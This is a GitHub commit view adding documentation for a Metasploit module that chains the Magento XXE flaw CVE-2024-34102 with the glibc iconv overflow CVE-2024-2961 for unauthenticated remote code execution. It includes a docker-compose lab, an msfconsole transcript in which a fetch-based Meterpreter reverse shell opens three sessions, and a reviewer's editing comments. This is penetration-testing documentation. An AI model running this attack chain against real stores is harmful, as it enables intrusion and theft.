forked from rapid7/metasploit-framework
Magento XXE to GLIBC buffer overflow
1 parent 76d55c9, commit 9536eaa
Showing 3 changed files with 784 additions and 0 deletions.
154 changes: 154 additions & 0 deletions: documentation/modules/exploit/linux/http/magento_xxe_to_glibc_buf_overflow.md
@@ -0,0 +1,154 @@ | ||
## Vulnerable Application | ||
This combination of an Arbitrary File Read (CVE-2024-34102) and a Buffer Overflow in glibc (CVE-2024-2961) | ||
allows for unauthenticated Remote Code Execution on the following versions of Magento and Adobe Commerce and | ||
earlier if the PHP and glibc versions are also vulnerable: | ||
- 2.4.7 and earlier | ||
- 2.4.6-p5 and earlier | ||
- 2.4.5-p7 and earlier | ||
- 2.4.4-p8 and earlier | ||
|
||
Vulenerable PHP versions: | ||
- From PHP 7.0.0 (2015) to 8.3.7 (2024) | ||
|
||
Vulnerable iconv() function in the GNU C Library: | ||
- 2.39 and earlier | ||
|
||
The exploit chain is quite interesting and for more detailed information I suggest reading the links in the | ||
references. I'll give a very brief over view. CVE-2024-34102 is and XML External Entity vulnerability which | ||
leverages PHP filters to read arbitrary files off the target system. The exploit chain uses this to read | ||
/proc/self/maps off the system which provides the address of PHP's heap and the filename of the libc. Then | ||
using the file read again the libc binary is downloaded and the exploit extracts the address and offset of the | ||
following functions which are used to write the payload: libc_malloc, libc_system and libc_realloc. | ||
|
||
With this information and expert knowledge of PHP, it's: chunks, free lists, buckets, bucket brigades and how | ||
all such things are are stored in memory and affected by PHP filters, CVE-2024-2961 can then be exploited. A | ||
long chain of PHP filters is constructed and sent in the same way the XXE is exploited which allows for; a | ||
payload to be written to memory and for the buffer overflow to be exploited in order to redirect execution to | ||
obtain RCE. | ||
|
||
### Setup | ||
|
||
The following docker-compose file can be used to test this module. There are a few things that need to be noted: | ||
1. cURL is not installed by default in the target container, in order for a fetch payload to be successful run the | ||
following once the container has been started: | ||
``` | ||
docker exec -it magento_magento_1 bash | ||
root@13c538f53068:/# apt update; apt install curl -y | ||
``` | ||
2. The docker-compose file sets magento server's name to `localhost` and in order to exploit the container `rhost` must | ||
be set to `localhost` (setting `rhost` to `127.0.0.1` or your local IP address will not work for this docker-compose file) | ||
and so given this configuration `msfconsole` must be running on the same host as the container. | ||
3. The network settings on my macbook didn't allow me to exploit this locally so I was running the containers and | ||
`msfconsole` from an Ubuntu 22.04 VM. | ||
|
||
``` | ||
services: | ||
mariadb: | ||
image: docker.io/bitnami/mariadb:10.6 | ||
environment: | ||
# ALLOW_EMPTY_PASSWORD is recommended only for development. | ||
- ALLOW_EMPTY_PASSWORD=yes | ||
- MARIADB_USER=bn_magento | ||
- MARIADB_DATABASE=bitnami_magento | ||
volumes: | ||
- 'old_mariadb_data:/bitnami/mariadb' | ||
magento: | ||
image: docker.io/bitnami/magento:2.4.7-debian-12-r0 | ||
ports: | ||
- '80:8080' | ||
- '443:8443' | ||
environment: | ||
- MAGENTO_HOST=localhost | ||
- MAGENTO_DATABASE_HOST=mariadb | ||
- MAGENTO_DATABASE_PORT_NUMBER=3306 | ||
- MAGENTO_DATABASE_USER=bn_magento | ||
- MAGENTO_DATABASE_NAME=bitnami_magento | ||
- ELASTICSEARCH_HOST=elasticsearch | ||
- ELASTICSEARCH_PORT_NUMBER=9200 | ||
# ALLOW_EMPTY_PASSWORD is recommended only for development. | ||
- ALLOW_EMPTY_PASSWORD=yes | ||
volumes: | ||
- 'old_magento_data:/bitnami/magento' | ||
depends_on: | ||
- mariadb | ||
- elasticsearch | ||
elasticsearch: | ||
image: docker.io/bitnami/elasticsearch:7 | ||
volumes: | ||
- 'old_elasticsearch_data:/bitnami/elasticsearch/data' | ||
volumes: | ||
old_mariadb_data: | ||
driver: local | ||
old_magento_data: | ||
driver: local | ||
old_elasticsearch_data: | ||
driver: local | ||
``` | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
1. Do: `use ` | ||
1. Set the `RHOST`, `SRVHOST` and `LHOST` options | ||
1. Run the module | ||
1. Receive 3 Meterpreter sessions as the `daemon` user. | ||
|
||
## Scenarios | ||
### | ||
``` | ||
msf6 > use magento_xxe_to_glibc_buf_overflow | ||
Matching Modules | ||
================ | ||
# Name Disclosure Date Rank Check Description | ||
- ---- --------------- ---- ----- ----------- | ||
0 exploit/linux/http/magento_xxe_to_glibc_buf_overflow 1970-01-01 excellent No CosmicSting: Magento Arbitrary File Read (CVE-2024-34102) + PHP Buffer Overflow in the iconv() function of glibc (CVE-2024-2961) | ||
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/magento_xxe_to_glibc_buf_overflow | ||
[*] Using exploit/linux/http/magento_xxe_to_glibc_buf_overflow | ||
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set srvhost 172.16.199.130 | ||
srvhost => 172.16.199.130 | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set fetch_srvhost 172.16.199.130 | ||
fetch_srvhost => 172.16.199.130 | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set rhost localhost | ||
rhost => localhost | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > run | ||
[*] Exploit running as background job 6. | ||
[*] Started reverse TCP handler on 172.16.199.130:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Using URL: http://172.16.199.130:8080/ | ||
[*] Server started | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > | ||
[+] Exploit precondition 1/3 met: Detected Magento Community edition version 2.4 which is vulnerable. | ||
[+] Exploit precondition 2/3 met: PHP appears to be exploitable. | ||
[+] Exploit precondition 3/3 met: glibc is version: 2.36 | ||
[+] The target appears to be vulnerable. | ||
[*] Attempting to parse libc to extract necessary symbols and addresses | ||
[*] Attempting to build an exploit PHP filter path with the information extracted from libc and /proc/self/maps | ||
[*] Sending payload... | ||
[*] Sending stage (3045380 bytes) to 172.25.0.4 | ||
[*] Sending stage (3045380 bytes) to 172.25.0.4 | ||
[*] Sending stage (3045380 bytes) to 172.25.0.4 | ||
[*] Meterpreter session 4 opened (172.16.199.130:4444 -> 172.25.0.4:41354) at 2024-10-09 11:26:31 -0700 | ||
[*] Meterpreter session 5 opened (172.16.199.130:4444 -> 172.25.0.4:41366) at 2024-10-09 11:26:31 -0700 | ||
[*] Meterpreter session 6 opened (172.16.199.130:4444 -> 172.25.0.4:41370) at 2024-10-09 11:26:31 -0700 | ||
[*] Server stopped. | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > sessions -i -1 | ||
[*] Starting interaction with 6... | ||
meterpreter > getuid | ||
Server username: daemon | ||
meterpreter > sysinfo | ||
Computer : 172.25.0.4 | ||
OS : Debian 12.5 (Linux 6.8.0-45-generic) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
meterpreter > | ||
``` |
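Review bot: the Verification Steps are incomplete: step 2 reads `Do: \`use \`` with no module path and should be `use exploit/linux/http/magento_xxe_to_glibc_buf_overflow`, and step 3 lists only `RHOST`, `SRVHOST` and `LHOST` although the Scenarios transcript also has to `set fetch_srvhost` because the default payload is `cmd/linux/http/x64/meterpreter/reverse_tcp`; add `FETCH_SRVHOST` there. The bare `###` under `## Scenarios` is an empty heading; title it after the Bitnami Magento 2.4.7 docker-compose target that the Setup section describes, or drop it. The transcript shows `Disclosure Date` as `1970-01-01`, which is plainly not the real date; check the module's `DisclosureDate` rather than shipping that in the docs. Step 5 promises "3 Meterpreter sessions" and the transcript confirms three stages sent to 172.25.0.4, but nothing explains why the payload executes three times; one sentence on that (and whether the extra sessions are expected or a side effect) would help operators. Under "Vulnerable iconv() function in the GNU C Library: 2.39 and earlier", add the caveat that distribution builds backport the CVE-2024-2961 fix without changing the version string, so the module's "precondition 3/3 met: glibc is version: 2.36" line is a version check, not proof that iconv is exploitable. "I suggest reading the links in the references" points at nothing in this file; either add a References section or refer to the module's `References` metadata. Minor spelling: "Vulenerable" -> "Vulnerable", "is and XML" -> "is an XML", "over view" -> "overview", "it's: chunks" -> "its chunks", "are are stored" -> "are stored".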